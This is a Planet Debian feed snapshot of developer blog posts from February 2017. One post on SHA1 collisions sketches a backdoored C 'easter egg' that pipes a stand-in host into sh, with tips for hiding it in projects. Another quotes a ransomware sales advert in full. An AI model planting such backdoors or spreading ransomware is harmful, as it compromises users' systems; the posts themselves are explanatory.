Planet Debian - http://planet.debian.org/
Feed: http://planet.debian.org/rss20.xml



 



Kees Cook: security things in Linux v4.10

Tue, 28 Feb 2017 06:31:42 +0000

Previously: v4.9. Here’s a quick summary of some of the interesting security things in last week’s v4.10 release of the Linux kernel:

PAN emulation on arm64: Catalin Marinas introduced ARM64_SW_TTBR0_PAN, which is functionally the arm64 equivalent of arm’s CONFIG_CPU_SW_DOMAIN_PAN. While Privileged eXecute Never (PXN) has been available in ARM hardware for a while now, Privileged Access Never (PAN) will only be available in hardware once vendors start manufacturing ARMv8.1 or later CPUs. Right now, everything is still ARMv8.0, which left a gap in security flaw mitigations on ARM, since CONFIG_CPU_SW_DOMAIN_PAN can only provide PAN coverage on ARMv7 systems and nothing existed on ARMv8.0. This solves that problem and closes a common exploitation method for arm64 systems.

thread_info relocation on arm64: As done earlier for x86, Mark Rutland has moved thread_info off the kernel stack on arm64. With thread_info no longer on the stack, it’s more difficult for attackers to find it, which makes it harder to subvert the very sensitive addr_limit field.

linked list hardening: I added CONFIG_BUG_ON_DATA_CORRUPTION to restore the original CONFIG_DEBUG_LIST behavior that existed prior to v2.6.27 (9 years ago): if list metadata corruption is detected, the kernel refuses to perform the operation, rather than just WARNing and continuing with the corrupted operation anyway. Since linked list corruption (usually via heap overflows) is a common method for attackers to gain a write-what-where primitive, it’s important to stop the list add/del operation if the metadata is obviously corrupted.

seeding kernel RNG from UEFI: A problem for many architectures is finding a viable source of early boot entropy to initialize the kernel Random Number Generator. For x86, this is mainly solved with the RDRAND instruction. On ARM, however, the solutions continue to be very vendor-specific. As it turns out, UEFI is supposed to hide various vendor-specific things behind a common set of APIs. The EFI_RNG_PROTOCOL call is designed to provide entropy, but it can’t be called when the kernel is running. To get entropy into the kernel, Ard Biesheuvel created a UEFI config table (LINUX_EFI_RANDOM_SEED_TABLE_GUID) that is populated during the UEFI boot stub and fed into the kernel entropy pool during early boot.

arm64 W^X detection: As done earlier for x86, Laura Abbott implemented CONFIG_DEBUG_WX on arm64. Now any dangerous arm64 kernel memory protections will be loudly reported at boot time.

64-bit get_user() zeroing fix on arm: While the fix itself is pretty minor, I like that this bug was found through a combined improvement to the usercopy test code in lib/test_user_copy.c. Hoeun Ryu added zeroing-on-failure testing, and I expanded the get_user()/put_user() tests to include all sizes. Neither improvement alone would have found the ARM bug, but together they uncovered a typo in a corner case.

no-new-privs visible in /proc/$pid/status: This is a tiny change, but I like being able to introspect processes externally. Prior to this, I wasn’t able to trivially answer the question “is that process setting the no-new-privs flag?” To address this, I exposed the flag in /proc/$pid/status, as NoNewPrivs.

That’s all for now! Please let me know if you saw anything else you think needs to be called out. :) I’m already excited about the v4.11 merge window opening…

© 2017, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License. [...]
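For instance, that last change makes external introspection a shell one-liner. A minimal sketch (the PID is hypothetical, and the field only exists on v4.10 or later kernels):

# prints e.g. "NoNewPrivs:	1" when the flag is set for PID 1234
grep '^NoNewPrivs:' /proc/1234/status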



Gunnar Wolf: Much belated book presentation, this Saturday

Tue, 28 Feb 2017 05:21:51 +0000


Once again, I'm making an announcement mainly for my local circle of friends and (gasp!) followers. For those of you more than 100 km away from Mexico City, please disregard this message.

Back in July 2015, after two years of hard work, my university finished publishing my second book. This is a textbook for the subject I teach in Computer Engineering: Operating Systems Fundamentals.

The book has been, from its inception, fully available online under a permissive (CC-BY) license. One of the book's aimed contributions is to present a text natively written in Spanish. Besides, our goal (I coordinated a team of authors, working with two colleagues from Rosario, Argentina, and one from Cauca, Colombia) was to provide a book students can easily and legally share.

I have got many good reviews so far, and after teaching based on it for four years (while working on it and after its publication), I can attest that the material is light enough to fit a Bachelor's-level course, while deep enough to make our students sweat healthily ;-)

Anyway: I have been scheduled to present the book at my university's main book fair, the 38 Feria Internacional del Libro del Palacio de Minería, this Saturday, 2017.03.04, at 16:00 in Salón Manuel Tolsá. What's even better: this time, I won't be preparing a speech! The book will be presented by two very good friends of mine, José María Serralde and Rolando Cedillo. Both of them are clever, witty, fun, and a real honor to work with. Of course, having them present our book is more than a double honor.

So, everybody who can make it: FIL Minería is always great and fun. Come share the love! Come have a book! Or, at least, have a good time and a nice chat with us!




Urvika Gola: Outreachy- Week 8 & 9 Progress

Tue, 28 Feb 2017 04:46:59 +0000


Working with 9-Patch images, adapter classes and layouts in Android.

Before starting this new task, I had never wondered: "How does that bubble around our chat messages wrap around the width of the text we write?"

The images used as the background of our messages are called 9-patch images.

They stretch themselves according to the text length and font size!

Android will automatically resize the image to accommodate the contents. (Illustration: developer.android.com)

How great it would be if the clothes we wear could also work the same way and fit according to body size. I could then still wear my cute, nostalgic childhood dresses…

I edited two sets of 9-patch bubble images, one for incoming and one for outgoing SIP messages.

These images have to be designed a certain way: store them at the smallest size that works, and leave a 1px border on all sides for the stretch markers. Details are clearly explained in the Android documentation:

https://developer.android.com/guide/topics/graphics/2d-graphics.html#nine-patch

Then, save the image by inserting “.9” between the file name and the extension. For example, if your image is named bubble.png, rename it to bubble.9.png.

They should be stored like any other image file, in the res/drawable folder.
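As a quick sketch of that convention (file and path names are only examples):

# mark the edited PNG as a 9-patch by renaming it
mv bubble.png bubble.9.png

# store it with the rest of the drawables
mv bubble.9.png res/drawable/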

Using 9-patch images, these problems are taken care of:

  1. The image proportions are set according to different screen sizes automatically.
     You don’t have to create multiple PNGs of different pixel sizes for multiple screen sizes.
  2. The image resizes itself according to the text size set on the user’s phone.

I had to modify the existing Lumicall SIP message screen, which had a simple ListView as the chat message holder, and replace it with 9-patch bubble images to make it more interactive.

Voila! What a simple way to provide a valuable usability feature.

 






Joey Hess: making git-annex secure in the face of SHA1 collisions

Mon, 27 Feb 2017 21:15:00 +0000


git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it?

Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified).

When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks.

This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see https://git-annex.branchable.com/tips/using_signed_git_commits/.

My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits.
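For illustration, the git side of that advice could look like this (a sketch using plain git commands; the branch name is hypothetical, and the git-annex specifics are on the tips page linked above):

# sign every commit made in this repository
git config commit.gpgsign true

# before trusting fetched history, verify its signature
git verify-commit origin/master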

PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. However secure that might be…




Matthew Garrett: The Fantasyland Code of Professionalism is an abuser's fantasy

Mon, 27 Feb 2017 01:40:11 +0000

The Fantasyland Institute of Learning is the organisation behind Lambdaconf, a functional programming conference perhaps best known for standing behind a racist they had invited as a speaker. The fallout of that has resulted in them trying to band together events in order to reduce disruption caused by sponsors or speakers declining to be associated with conferences that think inviting racists is more important than the comfort of non-racists, which is weird in all sorts of ways but not what I'm talking about here, because they've also written a "Code of Professionalism" which is like a Code of Conduct except it protects abusers rather than minorities, and no, really, it is genuinely as bad as it sounds.

The first thing you need to know is that the document uses its own jargon. Important here are the concepts of active and inactive participation - active participation is anything that you do within the community covered by a specific instance of the Code, inactive participation is anything that happens anywhere ever (ie, active participation is a subset of inactive participation). The restrictions based around active participation are broadly those that you'd expect in a very weak code of conduct - it's basically "Don't be mean", but with some quirks. The most significant is that there's a "Don't moralise" provision, which as written means saying "I think people who support slavery are bad" in a community setting is a violation of the code, but the description of discrimination means saying "I volunteer to mentor anybody from a minority background" could also result in any community member not from a minority background complaining that you've discriminated against them. It's just not very good.

Inactive participation is where things go badly wrong. If you engage in community or professional sabotage, or if you shame a member based on their behaviour inside the community, that's a violation. Community sabotage isn't defined and so basically allows a community to throw out whoever they want to. Professional sabotage means doing anything that can hurt a member's professional career. Shaming is saying anything negative about a member to a non-member if that information was obtained from within the community.

So, what does that mean? Here are some things that you are forbidden from doing:

  • If a member says something racist at a conference, you are not permitted to tell anyone who is not a community member that this happened (shaming)
  • If a member tries to assault you, you are not allowed to tell the police (shaming)
  • If a member gives a horribly racist speech at another conference, you are not allowed to suggest that they shouldn't be allowed to speak at your event (professional sabotage)
  • If a member of your community reports a violation and no action is taken, you are not allowed to warn other people outside the community that this is considered acceptable behaviour (community sabotage)

Now, clearly, some of these are unintentional - I don't think the authors of this policy would want to defend the idea that you can't report something to the police, and I'm sure they'd be willing to modify the document to permit this. But it's indicative of the mindset behind it. This policy has been written to protect people who are accused of doing something bad, not to protect people who have something bad done to them.

There are other examples of this. For instance, violations are not publicised unless the verdict is that they deserve banishment. If a member harasses another member but is merely given a warning, the victim is still not permitted to tell anyone else that this happened. The perpetrator is then free to repeat their behaviour in other communities, and the victim has to choose between either staying silent or warning them and risk being banished from the community for shaming.

If you're an abuser then this is perfect. You're in a position where your victims have to choose between their career (which will be harmed if they're unab[...]



Steinar H. Gunderson: 10-bit H.264 tests

Mon, 27 Feb 2017 00:02:00 +0000

Following the post about 10-bit Y'CbCr earlier this week, I thought I'd make an actual test of 10-bit H.264 compression for live streaming. The basic question is: sure, it's better per bit, but it's also slower, so is it better per MHz?

This is largely inspired by Ronald Bultje's post about streaming performance, where he largely showed that HEVC is currently useless for live streaming from software; unless you can encode at x264's “veryslow” preset (which, at 720p60, means basically rather simple content and 20 cores or so), the best x265 presets you can afford will give you worse quality than the best x264 presets you can afford. My results will maybe not be as scientific, but hopefully still enlightening.

I used the same test clip as Ronald, namely a two-minute clip of Tears of Steel. Note that this is an 8-bit input, so we're not testing the effects of 10-bit input; it's just testing the increased internal precision in the codec. Since my focus is practical streaming, I ran the latest version of x264 with four threads (a typical desktop machine), using one-pass encoding at 4000 kbit/sec. Nageru's speed control has 26 presets to choose from, which gives pretty smooth steps between neighboring ones, but I've been sticking to the ten standard x264 presets (ultrafast, superfast, veryfast, faster, fast, medium, slow, slower, veryslow, placebo).

Here's the graph: The x-axis is seconds used for the encode (note the logarithmic scale; placebo takes 200–250 times as long as ultrafast). The y-axis is SSIM dB, so up and to the left is better. The blue line is 8-bit, and the red line is 10-bit. (I ran most encodes five times and averaged the results, but it doesn't really matter, due to the logarithmic scale.)

The results are actually much stronger than I assumed; if you run on (8-bit) ultrafast or superfast, you should stay with 8-bit, but from there on, 10-bit is on the Pareto frontier. Actually, 10-bit veryfast (18.187 dB) is better than 8-bit medium (18.111 dB), while being four times as fast!

But not all of us have a relation to dB quality, so I chose to also do a test that maybe is a bit more intuitive, centered around the bitrate needed for constant quality. I locked quality to 18 dB, i.e., for each preset, I adjusted the bitrate until the SSIM showed 18.000 dB plus/minus 0.001 dB. (Note that this means faster presets get less of a speed advantage, because they need a higher bitrate, which means more time spent entropy coding.) Then I measured the encoding time (again five times) and graphed the results: the x-axis is again seconds, and the y-axis is the bitrate needed in kbit/sec, so lower and to the left is better. Blue is again 8-bit and red is again 10-bit.

If the previous graph was enough to make me intrigued, this is enough to make me excited. In general, 10-bit gives 20-30% lower bitrate for the same quality and CPU usage! (Compare this with the supposed “up to 50%“ benefits of HEVC over H.264, given infinite CPU usage.) The most dramatic example is when comparing the “medium” presets directly, where 10-bit runs at 2648 kbit/sec versus 3715 kbit/sec (29% lower bitrate!) and is only 5% slower. As one progresses towards the slower presets, the gap is somewhat narrowed (placebo is 27% slower and “only” 24% lower bitrate), but in the realistic middle range, the difference is quite marked. If you run 3 Mbit/sec at 10-bit, you get the quality of 4 Mbit/sec at 8-bit.

So is 10-bit H.264 a no-brainer? Unfortunately, no; the client hardware support is nearly nil. Not even Skylake, which can do 10-bit HEVC encoding in hardware (and 10-bit VP9 decoding), can do 10-bit H.264 decoding in hardware. Worse still, mobile chipsets generally don't support it. There are rumors that the iPhone 6s supports it, but these are unconfirmed; some Android chips support it, but most don't. I guess this explains a lot of the limited uptake; since it's in some ways a new codec, implementers are more keen[...]
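For reference, a typical encode from such a test could be reproduced roughly along these lines (a sketch: the input file name is made up, and older x264 builds need a separately compiled 10-bit binary instead of the --output-depth switch):

# one-pass 4000 kbit/sec encode, four threads, 10-bit output
x264 --preset veryfast --threads 4 --bitrate 4000 \
     --output-depth 10 -o out-10bit.mkv tears_of_steel_720p60.y4m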



Jonas Meurer: debian lts report 2017.02

Sat, 25 Feb 2017 17:22:01 +0000

Debian LTS report for February 2017

February 2017 was my sixth month as a Debian LTS team member. I was allocated 5 hours and had 9.75 hours left over from January 2017. This makes a total of 14.75 hours. I spent all of them doing the following:

  • DLA 831-1: Fix buffer overflows in gtk-vnc
  • Reviewed the apache2 2.2.22-13+deb7u8 upload, improved the patches
  • Reviewed CVE-2017-5666 (mp3splt)
  • DLA 836-1: Fix command injection vulnerability in munin cgi script



Stefano Zacchiroli: Software Freedom Conservancy matching

Sat, 25 Feb 2017 15:15:10 +0000

become a Conservancy supporter by February 28th and have your donation matched

Non-profits that provide project support have proven themselves to be necessary for the success and advancement of individual projects and Free Software as a whole. The Free Software Foundation (founded in 1985) serves as a home to GNU projects and a canonical list of Free Software licenses. The Open Source Initiative came about in 1998, maintaining the Open Source Definition, based on the Debian Free Software Guidelines, with affiliate members including Debian, Mozilla, and the Wikimedia Foundation. Software in the Public Interest (SPI) was created in the late 90s largely to act as a fiscal sponsor for projects like Debian, enabling it to do things like accept donations and handle other financial transactions.

More recently (2006), the Software Freedom Conservancy was formed. Among other activities—like serving as a fiscal sponsor, infrastructure provider, and support organization for a number of free software projects including Git, Outreachy, and the Debian Copyright Aggregation Project—they protect user freedom via copyleft compliance and GPL enforcement work. Without a willingness to act when licenses are violated, copyleft has no power. Through communication, collaboration, and—only as last resort—litigation, the Conservancy helps everyone who uses a freedom respecting license.

The Conservancy has been aggressively fundraising in order to not just continue its current operations, but expand its work, staff, and efforts. They recently launched a donation matching campaign thanks to the generosity and dedication of an anonymous donor. Everyone who joins the Conservancy as an annual Supporter by February 28th will have their donation matched.

A number of us are already supporters, and we hope you will join us in supporting the work of an organization that supports us.




Martin Pitt: systemd 233 about to be released, please help testing

Sat, 25 Feb 2017 12:41:42 +0000


systemd 233 is scheduled to be released next week, and there is only a handful of small issues left. As usual there are tons of improvements and fixes, but the most intrusive one probably is another attempt to move from legacy cgroup v1 to a “hybrid” setup where the new unified (cgroup v2) hierarchy is mounted at /sys/fs/cgroup/unified/ and the legacy one stays at /sys/fs/cgroup/ as usual. This should provide an easier path for software like Docker or LXC to migrate to the unified hierarchy, but even that hybrid mode broke some bits.

While systemd 233 will not make it into Debian stretch or Ubuntu zesty, as both are in feature freeze, it will soon be available in Debian experimental, and in the next Ubuntu release after 17.04 gets released. Thus now is another good time to give this some thorough testing!

To help with this, please give the PPA with builds from upstream master a spin. In addition to the usual packages for Ubuntu 16.10 I also uploaded a build for Ubuntu zesty, and a build for Debian stretch (aka testing) which also works on Debian sid. You can use that URL as an apt source:

deb [trusted=yes] https://people.debian.org/~mpitt/tmp/systemd-master-20170225/ /
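For example, to wire that into apt (a sketch; the list file name is arbitrary):

echo 'deb [trusted=yes] https://people.debian.org/~mpitt/tmp/systemd-master-20170225/ /' \
    | sudo tee /etc/apt/sources.list.d/systemd-master.list
sudo apt update && sudo apt install systemd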

These packages pass our autopkgtests and I tested them manually too. LXC and LXD work fine, docker.io/runc needs a fix which I uploaded to Ubuntu zesty. (It’s not yet available in Debian, sorry.)

Please file reports about regressions on GitHub, but please also let me know about successes on my Google+ page so that we can get some idea of how many people tested this.

Thank you, and happy booting!




Gunnar Wolf: Started getting ads for ransomware. Coincidence?

Fri, 24 Feb 2017 19:06:41 +0000


Very strange. Verrrry strange.

Yesterday I wrote a blog post on spam stuff that has been hitting my mailbox. Nothing too deep, just me scratching my head.

Coincidentally (I guess/hope), I have been getting messages via my Bitlbee on one of my Jabber accounts, offering me ransomware services. I am reproducing the message here, omitting of course everything I can recognize as their brand names and related URLs (as I'm not going to promote the 3vi1-doers). I'm reproducing it in whole, as I'm sure the information will be interesting for some.

*BRAND* Ransomware - The Most Advanced and Customisable you've Ever Seen
Conquer your Independence with *BRAND* Ransomware Full Lifetime License!
* UNIQUE FEATURES
* NO DEPENDENCIES (.net or whatever)!!!
* Edit file Icon and UAC - Works on All Windows Versions
* Set Folders and Extensions to Encrypt, Deadline and Russian Roulette
* Edit the Text, speak with voice (multilang) and Colors for Ransom Window
* Enable/disable USB infect, network spread & file melt
* Set Process Name, sleep time, update ransom amount, Give mercy button
* Full-featured headquarter (for Windows) with unlimited builds, PDF reports, charts and maps, totally autonomous operation
* PHP Bridges instead of expensive C&C servers!
* Automatic Bitcoin payment detection (impossible to bypass/crack - we challege who says the contrary to prove what they say!)
* Totally/Mathematically IMPOSSIBLE to DECRYPT! Period.
* Award-Winning Five-Stars support and constant updates!
* We Have lot vouchs in *BRAND* Market, can check!
Watch the promo video: *URL*
Screenshots: *URL*
Website: *URL*
Price: $389
Promo: just $309 - 20% OFF! until 25th Feb 2017
Jabber: *JID*

I think I can comment on this with my students. Hopefully, this is interesting to others.
Now... I had never received Jabber-spam before. This message has been sent to me 14 times in the last 24 hours (all from different JIDs, all unknown to me). I hope this does not last forever :-/ Otherwise, I will have to learn more about how to configure Bitlbee to ignore contacts not known to me. Grrr...




Jonathan Dowland: OpenShift Java S2I

Fri, 24 Feb 2017 15:21:34 +0000


One of the products I have done some work on at Red Hat has recently been released to customers and there have been a few things written about it:




Ritesh Raj Sarraf: Shivratri

Fri, 24 Feb 2017 14:43:12 +0000


The truth of life: the cremation ground.

It is the abode of Shiva.

Kali's tandava dance

salutes Shiva.





Sven Hoexter: Tcl and https - back to TclCurl

Fri, 24 Feb 2017 12:04:28 +0000

It must be the irony of life that I was about to give up the TclCurl Debian package some time ago, and now I'm using it again for some very old and horrible web-scraping code.

The world moved on to https, but the Tcl http package only supports unencrypted http. You can combine it with the tls package as explained in the wiki, but that seems overly complicated compared to just loading the TclCurl binding and moving on with something like this:

package require TclCurl
# download to a variable
curl::transfer -url https://sven.stormbind.net -bodyvar page
# or store it in a file
curl::transfer -url https://sven.stormbind.net -file page.html

Now the remaining problem is that the code is unmaintained upstream, and there is one codebase on Bitbucket and one on GitHub. While I fed patches to the Bitbucket repo and thus based the Debian package on that repo, the GitHub repo diverged in a different direction.




Joey Hess: SHA1 collision via ASCII art

Fri, 24 Feb 2017 01:06:22 +0000

Happy SHA1 collision day everybody!

If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files.

The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\

(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.)

Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:

7*yLN#!NOKj@{FPKW".6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ

And the "bad" data chunk like this:

9xiV^Ksn=w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh

Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:

7*yLN#!NOK
3*\LN'\NO@
3*/LN \.A
5*\LN \.
>=======:)
5*\7N /.
3*/7N /.V
3*\7N'/NO@
7*y7N#!NOX

Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN \\.A \
5*\\LN \\. \
>=======:) \
5*\\7N /. \
3*/7N /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */

/* Call this at the top of main() */
check_display_easter_egg (char **argv) {
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == '9')
        system("curl http://evil.url | sh");
}

Now, you need a C obfuscation person, to make that backdoor a little less obvious. (Hint: Add code to fix the newlines, paint additional ASCII sprites over top of the static art, etc., add animations, and bury the shellcode in there.)

After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs.

Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chunk. You can then replace the good file with the bad version here and there, and no one will be the wiser (except the easter egg will display the "bad" first line before it roots them).

Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing t[...]



Stig Sandbeck Mathisen: Change all the passwords (again)

Thu, 23 Feb 2017 23:00:00 +0000

Looks like it is time to change all the passwords again. There’s a tiny little flaw in a CDN used … everywhere, it seems.

Here’s a quick hack for users of the “pass” password manager to quickly find the domains affected. It is not perfect, but it is fast. :)

#!/bin/bash

# Stig Sandbeck Mathisen 

# Checks the content of "pass" against the list of sites using cloudflare.
# Expect false positives, and possibly false negatives.

# TODO: remove the left part of each hostname from pass, to check domains.

set -euo pipefail

tempdir=$(mktemp -d)
trap 'echo >&2 "removing ${tempdir}" ; rm -rf "$tempdir"' EXIT

git clone https://github.com/pirate/sites-using-cloudflare.git "$tempdir"

grep -F -x -f \
  <(pass git ls-files  | sed -e s,/,\ ,g -e s/.gpg// | xargs -n 1 | sort -u) \
  "${tempdir}/sorted_unique_cf.txt" \
  | sort -u

Update: The previous example used parallel. Actually, I didn’t need that. Turns out, using grep correctly is much faster than using grep the wrong way. Lesson: Read the manual. :)




Steinar H. Gunderson: Fyrrom recording released

Thu, 23 Feb 2017 22:28:00 +0000


The recording of yesterday's Fyrrom (Samfundet's unofficial take on Boiler Room) is now available on YouTube. Five video inputs, four hours, two DJs, no dropped frames. Good times.

Soundcloud coming soon!




Steve Kemp: Rotating passwords

Thu, 23 Feb 2017 22:00:00 +0000


Like many people I use a password manager to record logins to websites. I previously used a tool called pwsafe, but these days I have switched to pass.

Although I don't like the fact that the metadata is exposed, the tool is very useful, and its integration with git is both simple and reliable.

Reading about the security issue that recently affected cloudflare made me consider rotating some passwords. Using git I figured I could look at the last update-time of my passwords. Indeed that was pretty simple:

git ls-tree -r --name-only HEAD | while read filename; do
  echo "$(git log -1 --format="%ad" -- $filename) $filename"
done

Of course that's not quite enough, because we want it sorted, and to do that using the seconds-since-epoch is neater. Altogether I wrote this:

#!/bin/sh
#
# Show password age - should be useful for rotation - we first of all
# format the timestamp of every *.gpg file, as both unix+relative time,
# then we sort, and finally we output that sorted data - but we skip
# the first field which is the unix-epoch time.
#
( git ls-tree -r --name-only HEAD | grep '\.gpg$' | while read filename; do \
      echo "$(git log -1 --format="%at %ar" -- $filename) $filename" ; done ) \
        | sort | awk '{for (i=2; i<=NF; i++) printf("%s ", $i); printf("\n")}'

Not the cleanest script I've ever hacked together, but the output is nice:

 steve@ssh ~ $ cd ~/Repos/personal/pass/
 steve@ssh ~/Repos/personal/pass $ ./password-age | head -n 5
 1 year, 10 months ago GPG/root@localhost.gpg
 1 year, 10 months ago GPG/steve@steve.org.uk.OLD.gpg
 1 year, 10 months ago GPG/steve@steve.org.uk.NEW.gpg
 1 year, 10 months ago Git/git.steve.org.uk/root.gpg
 1 year, 10 months ago Git/git.steve.org.uk/skx.gpg

Now I need to pick the sites that are more than a year old and rotate their credentials. Or delete the accounts, as appropriate.




Joerg Jaspert: Automated wifi login

Thu, 23 Feb 2017 20:32:42 +0000

If you have the fortune of regularly needing to press some silly “Login” button for some wifi, the following little script may help you avoid this idiotic (and useless) task.

This example uses WIFIonICE, the free wifi on German ICE trains, simply because I ride them twice a day and got annoyed by the pointless Login button. A friend pointed me at just wget-ting the login page, so I made NetworkManager do this for me. It should work for anything similar that doesn’t need some elaborate web form filled out.

#!/bin/bash

# (Some) docs at
# https://wiki.ubuntuusers.de/NetworkManager/Dispatcher/

IFACE=${1:-"none"}
ACTION=${2:-"up"}

case ${ACTION} in
    up)
        CONID=${CONNECTION_ID:-$(iwconfig $IFACE | grep ESSID | cut -d":" -f2 | sed 's/^[^"]*"\|"[^"]*$//g')}
        if [[ ${CONID} == WIFIonICE ]]; then
            /usr/bin/timeout -k 20 15 /usr/bin/wget -q -O - http://www.wifionice.de/?login > /dev/null
        fi
        ;;
    *)
        # We are not interested in this
        :
        ;;
esac

This script needs to be put into /etc/NetworkManager/dispatcher.d, made executable, and owned by the root user. It will run on every connection change; that's why the ACTION is checked. The case may be a bit much here, but it could easily be extended to do a lot more.
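For example (a sketch; the target file name is arbitrary):

sudo install -o root -g root -m 0755 wifionice /etc/NetworkManager/dispatcher.d/90wifionice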

Yay, no more silly “Open this webpage and press login” crap.




Lucas Nussbaum: Implementing “right to disconnect” by delaying outgoing email?

Thu, 23 Feb 2017 07:26:20 +0000

(image)

France passed a law about the “right to disconnect” (more info here or here). The idea of not sending professional emails when people are not supposed to read them, in order to protect their private lives, is a pretty good one, especially when hierarchy is involved. However, I tend to do email at random times, and I would rather continue doing that, but just delay the actual sending of the email to the appropriate time (e.g., when I do email in the evening, it would actually be sent the following morning at 9am).

I wonder how I could make this fit into my email workflow. I write email using mutt on my laptop, then push it locally to nullmailer, which then relays it, over an SSH tunnel, to a remote server (running Exim4).

Of course the fallback solution would be to use mutt’s postponing feature. Or to draft the email in a text editor. But that’s not really nice, because it requires going back to the email at the appropriate time. I would like a solution where I would write the email, add a header (or maybe manually add a Date: header — in all cases that header should reflect the time the mail was sent, not the time it was written), send the email, and have nullmailer or the remote server queue it until the appropriate time is reached (e.g., delaying while “current_time < Date header in email”). I don’t want to do that for all emails: e.g. personal emails can go out immediately.

Any ideas on how to implement that? I’m attached to mutt and relaying using SSH, but not attached to nullmailer or exim4. Ideally the delaying would happen on my remote server, so that my laptop doesn’t need to be online at the appropriate time.
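One possible direction, as a sketch rather than a recommendation: wrap sendmail on the relay host so that evening mail is handed to at(1) and released at 9am. Every name and threshold here is only an assumption:

#!/bin/sh
# delayed-sendmail (hypothetical): queue evening mail until 09:00,
# pass everything else straight through to the real sendmail.
msg=$(mktemp) || exit 1
cat > "$msg"
hour=$(date +%H)
if [ "$hour" -ge 21 ] || [ "$hour" -lt 9 ]; then
    # at(1) runs the job at the next 09:00
    echo "/usr/sbin/sendmail $* < $msg && rm -f $msg" | at 09:00
else
    /usr/sbin/sendmail "$@" < "$msg" && rm -f "$msg"
fi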

Update: mutt does not allow setting the Date: field manually (if you enable the edit_headers option and edit it manually, its value gets overwritten). I have not found the relevant code yet, but that behaviour is mentioned in that bug.

Update 2: ah, it’s this code in sendlib.c (and there’s no way to configure that behaviour):

 /* mutt_write_rfc822_header() only writes out a Date: header with
 * mode == 0, i.e. _not_ postponment; so write out one ourself */
 if (post)
   fprintf (msg->fp, "%s", mutt_make_date (buf, sizeof (buf)));



Gunnar Wolf: Spam: Tactics, strategy, and angry bears

Thu, 23 Feb 2017 05:55:57 +0000

(image)

I know spam is spam is spam, and I know trying to figure out any logic underneath it is a lost cause. However... I am curious.

Many spam subjects are seemingly random, designed to convey whatever "information" they contain and fool spam filters. I understand that.

Many spam subjects are time-related. As an example, in the last months there has been a surge of spam mentioning Donald Trump. I am thankful: Very easy to filter out, even before it reaches spamassassin.

Of course, spam will find thousands of ways to talk about sex; cialis/viagra sellers, escort services, and a long list of WTF.

However... Tactical flashlights. Bright enough to blind a bear.

WTF‽‽‽

I mean... Truly. Really. WTF‽‽

What does that mean? Why is that even a topic? Who is interested in anything like that? How often does the average person go camping in the woods? Why do we need to worry about stupid bears attacking us? Why would a bear attack me?

The list of WTF questions could go on forever. What am I missing? What does "tactical flashlight" mean that I just fail to grasp? Has this appeared in your spam?




Neil McGovern: A new journey – GNOME Foundation Executive Director

Wed, 22 Feb 2017 16:50:06 +0000

For those who haven’t heard, I’ve been appointed as the new Executive Director of the GNOME Foundation, and I started last week, on the 15th of February.

It’s been an interesting week so far, mainly meeting lots of people and trying to get up to speed with what looks like an enormous job! However, I’m thoroughly excited by the opportunity and am very grateful for everyone’s warm words of welcome so far.

One of the main things I’m here to do is to try and help. GNOME is strong because of its community. It’s because of all of you that GNOME can produce world leading technologies and a desktop that is intuitive, clean and functional. So, if you’re stuck with something, or if there’s a way that either myself or the Foundation can help, then please speak up!

Additionally, I intend to make this blog a much more frequently updated one – letting people know what I’m doing, and highlighting cool things that are happening around the project. In that vein, this week I’ve also started contacting all our fantastic Advisory Board members. I’m also looking for sponsors for GUADEC and GNOME.Asia, so if you know of anyone, let me know! I’ve also booked my travel to the GTK+ hackfest and to LibrePlanet – if you’re going to either of those, make sure you come and introduce yourself :)

Finally, a small advertisement for Friends of GNOME. Your generosity really does help the Foundation support development of GNOME. Join up today!




Lisandro Damián Nicanor Pérez Meyer: Developing an nrf51822 based embedded device with Qt Creator and Debian

Wed, 22 Feb 2017 13:18:00 +0000

